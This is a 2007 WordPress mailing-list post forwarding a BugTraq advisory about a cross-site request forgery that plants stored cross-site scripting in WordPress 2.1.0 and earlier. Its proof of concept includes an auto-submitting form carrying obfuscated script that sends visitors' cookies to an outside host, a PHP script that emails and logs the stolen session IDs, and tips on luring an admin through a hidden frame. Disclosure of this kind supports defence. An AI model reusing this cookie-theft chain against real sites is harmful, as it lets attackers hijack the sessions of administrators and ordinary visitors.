[wp-hackers] FWD: [BugTraq] Wordpress <= v2.1.0

Ross M. W. Bennetts ross.bennetts at une.edu.au
Mon Mar 5 23:56:32 GMT 2007


----------------------------------------------------------------------------
-----
|               ____   ____.__         __
|
|               \   \ /   /|__|_______/  |_ __ _______  ___
|
|                \   Y   / |  \_  __ \   __\  |  \__  \ \  \/  /
|
|                 \     /  |  ||  | \/|  | |  |  // __ \_>    <
|
|                  \___/   |__||__|   |__| |____/(____  /__/\_ \
|
|                                                     \/      \/
|
|                             Security without illusions
|
|                                  www.virtuax.be
|
|
|
----------------------------------------------------------------------------
-----


                          Application: Wordpress
                  Vulnerable Versions: <= v2.1.0
                        Vulnerability: XSRF with XSS

                               Vendor: http://www.wordpress.net
                        Vendor Status: Notified

                                Found: 20-02-2007
                  Public Release Date: 01-03-2007
                        Last modified: 01-03-2007
                               Author: ciri
                               E-mail: ciri[a.t]virtuax[d.o.t]be
         
       reference: http://www.virtuax.be/advisories/Advisory4-20022007.txt

============================================================================
=====

Shouts to the VirtuaX Crew & Community!
Special thanks go out to R4N01 for noticing the XSS!

============================================================================
=====



I. Background
-------------

"WordPress is a state-of-the-art semantic personal publishing platform with
a 
 focus on aesthetics, web standards, and usability. "
                                                             by
wordpress.net

 
II. Vulnerablity
----------------

If you're logged in into wordpress as an admin, your comments aren't
properly 
sanitized, thus allowing an XSS to be posted. Normally an admin wouldn't 
input XSS input vectors, but we can make them do it with a simple XSRF
script.

IIa. Affected Versions
----------------------

I'm assuming all versions <= 2.1.0 are vulnerable although I have only
tested 
the latest version (2.1.0). This should work in all browsers that have 
JavaScript enabled (default in most browsers).

III. PoC
--------

[code=sploit.html]
<form action="http://example.com/wp-comments-post.php" method="post"
name="commentform" id="commentform">
<textarea name="comment" id="comment">
<script>location.href =
String.fromCharCode(x,y,z,q,r,s)+document.cookie;</script>
</script>
</textarea>

<input type="hidden" name="comment_post_ID" value="**ID**" />
</form>
<script>document.commentform.submit();</script>
[/code]

[code=steal.php]
<?php
//Get the session id
$id = $_GET["id"];

//Send it to our e-mail
mail("evilhacker at yoursite.com", "Cookie stolen", $id);

//Save a backup
$file = fopen('log.txt', 'a');
fwrite($file, $id . "\n\n");
?>
[/code]

Notes: 
        - **ID** should be the ID of the commentpage in which you want to
           inject the XSS. 
        - Replace 'String.fromCharCode(x,y,z,q,r,s)' with the appropiate 
          integers which lead to steal.php (you can look them up in an ASCII

          table).
             eg: http://yoursite.com/steel.php?id=
 
String.fromCharCode(104,116,116,112,58,47,47,121,111,117,1
	
14,115,105,116,101,46,99,111,109,47,115,116,101,101,108,46
		    ,112,104,112,63,105,100,61);

           We need to do this because Wordpress does escapes quotes.
                
We trick the admin into going to our sploit.html page (should be fairly easy

using basic social engineering skills). It is recommended that you hide the
page 
in a frame with no height, more stealth options are beyond the scope of this

advisory. Upon entering the page, the admin will post the XSS input vector
as a 
comment. Herafter he and EVERY other user that visits the page with comments
will 
automatically submit their session_id's to you.

Copyright 2007 by ciri from Virtuax.be All rights reserved.



More information about the wp-hackers mailing list